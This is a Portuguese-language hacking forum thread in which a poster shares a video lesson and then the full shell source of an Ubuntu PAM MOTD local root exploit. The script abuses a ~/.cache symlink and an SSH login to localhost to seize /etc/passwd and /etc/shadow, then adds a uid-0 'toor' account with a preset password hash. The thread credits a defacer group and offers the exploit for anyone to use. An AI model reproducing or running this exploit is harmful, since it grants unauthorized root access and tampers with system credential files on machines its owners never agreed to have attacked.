Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

+ download local root 2010 i686 pam motd

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Video Aula + download local root 2010 i686 pam motd

    Ola a todos , Trago mais um video onde mostro o exploit UBUNTU PAM MOTD, Para quem tinha problemas com root em maquinas ubuntu aqui está a solução,E tambem deixo um script nosso , que executa os comandos nescessarios, a Falha baseia-se em explorar a adiçao de usuarios temporarios em /etc/passwd e /etc/shadow , tambem em conjunto com Adiçao do usuario na Autrhorized key do ssh,

    Video aula:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Script:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Abraço a todos.
    n4sss@m4g1cl4b~#$I
    just this.

  • Font Size
    #2
    Muito bom n4sss, obrigado por compartilhar.
    Conferindo.

    att.



    areax@hotmail.com



    Comment


    • Font Size
      #3
      Opa! Vendo a descrição da aula, não entendi muito bem o que você faz. Elevação de privilégios? Baixando o vídeo, depois posto aqui o que achei. Até!

      Comment


      • Font Size
        #4
        Opa! Vendo a descrição da aula, não entendi muito bem o que você faz. Elevação de privilégios? Baixando o vídeo, depois posto aqui o que achei. Até!
        Sim é um exploit que nos da PRevilegios de root, sendo usuario comum, ou seja previlegy scalation.
        n4sss@m4g1cl4b~#$I
        just this.

        Comment


        • Font Size
          #5
          E para quem nao quiser baixar o exploit, deixo o fonte dele aqui, Bastando apenas salvar em .sh

          # através da criação de chaves SSH temporária de entrada em > authorized_keys Conseguimos acesso root.
          # Apartir disto podemos criar um script simples em sh, que Executa alguns passos, Para nos dar previlegios Elevados.
          # Isto acontece quando adcionamos um usuario temporario toor:toor com id 0 no arquivo /etc/passwd e /etc/shadow:
          #
          # n4sss@n4sss-PC:~$ bash n4sss.sh
          #[*] LOCAL ROOT UBUNTU PAM MOTD EDITED BY N4SSS =D Brazilians Defacers.
          #[*] OPS CHAV3 SSH ADQUIRIDA
          #[*] BACKUPED > /home/n4sss/.cache
          #[*] ACORDANDO O SSH
          # [+] PRONTO : /etc/passwd
          #[*] ACORDANDO O SSH
          # [+] PRONTO : /etc/shadow
          #[*] RESTAURADO > /home/n4sss/.cache
          #[*] CHAV3 SSH REMOVIDA
          # [+] HAHA > USE O PASSWORD TOOR PARA LOGAR
          # Senha:
          # root@n4sss-PC:/home/n4sss# id
          # uid=0(root) gid=0(root) grupos=0(root)
          # root@n4sss-PC:/home/n4sss#
          #
          # Greetz 4nd Cr3dits : Kristian
          #
          # Brazilians Defacers.
          #

          P='toor:x:0:0:root:/root:/bin/bash'
          S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCc EcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'
          echo "[*] LOCAL ROOT UBUNTU PAM MOTD EDITED BY N4SSS =D ROOTED 4 EVER."
          [ -z "$(which ssh)" ] && echo "[-] SSH É REQUIRIDO ." && exit 1
          [ -z "$(which ssh-keygen)" ] && echo "[-] GERADOR DE CHAVES SSH É REQUIRIDO " && exit 1
          [ -z "$(ps -u root |grep sshd)" ] && echo "[-] a SSH PRECISA ESTAR ATIVO." && exit 1
          backup() {
          [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak
          [ -e "$1" ] || return 0
          mv "$1"{,.bak} || return 1
          echo "[*] BACKUPED > $1"
          }
          restore() {
          [ -e "$1" ] && rm -rf "$1"
          [ -e "$1".bak ] || return 0
          mv "$1"{.bak,} || return 1
          echo "[*] RESTAURADO > $1"
          }
          key_create() {
          backup ~/.ssh/authorized_keys
          ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
          [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }
          mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
          echo "[*] OPS CHAV3 SSH ADQUIRIDA "
          }
          key_remove() {
          rm -f "$KEY"
          restore ~/.ssh/authorized_keys
          echo "[*] CHAV3 SSH REMOVIDA"
          }
          own() {
          [ -e ~/.cache ] && rm -rf ~/.cache
          ln -s "$1" ~/.cache || return 1
          echo "[*] ACORDANDO O SSH "
          ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
          [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }
          echo "[+] PRONTO : $1 "
          }
          bye() {
          key_remove
          exit 1
          }
          KEY="$(mktemp -u)"
          key_create || { echo "[-] FALHA NA CHAVE SSH"; exit 1; }
          backup ~/.cache || { echo "[-] FALHA NO BACKUP SSH ~/.cache"; bye; }
          own /etc/passwd && echo "$P" >> /etc/passwd
          own /etc/shadow && echo "$S" >> /etc/shadow
          restore ~/.cache || { echo "[-] FALHA NA RESTAURAÇAO ~/.cache"; bye; }
          key_remove
          echo "[+] HAHA > USE O PASSWORD TOOR PARA LOGAR "
          su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \
          chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor
          Abraço.
          n4sss@m4g1cl4b~#$I
          just this.

          Comment

          X
          Working...
          X